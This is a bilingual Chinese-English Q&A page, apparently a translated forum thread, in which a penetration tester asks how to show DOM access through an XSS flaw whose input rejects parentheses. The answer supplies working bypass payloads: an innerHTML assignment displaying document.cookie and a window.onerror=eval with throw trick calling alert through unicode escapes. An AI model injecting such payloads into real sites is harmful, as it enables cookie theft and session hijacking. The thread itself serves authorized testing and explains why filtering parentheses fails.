问题描述

我在客户端的应用程序中发现了跨站点脚本漏洞.问题在于易受攻击的参数不接受括号.所以像 alert(document.cookie) 这样的东西会因为括号而被拒绝.我可以使用 alert `xss` 获得 XSS，但我的客户需要能够访问 DOM 的证明.

I have found that Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like alert(document.cookie) will be rejected because of parentheses. I can get XSS using alert `xss` but I my client requires a proof of being able to access the DOM.

换句话说，我如何在没有括号的情况下alert(document.cookie)，还有其他选择吗?

In other words, How can I alert(document.cookie) without parentheses , are there any alternatives?

谢谢！

推荐答案

document.body.innerHTML=document.cookie 将在页面本身上显示 cookie.

document.body.innerHTML=document.cookie will display the cookies on the page itself.

说到 XSS 漏洞:是的，它很容易受到攻击，禁用括号只会迫使攻击者使用更有创意的方法.让某人执行任何任意代码是一种责任.

Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute any arbitrary code is a liability.

以下是一个简单示例，说明如何在输入中不使用任何括号的情况下调用具有任何参数的任何函数:

Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:

<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>

<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">

这篇关于JS 中的括号替代方案，如果有的话?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持！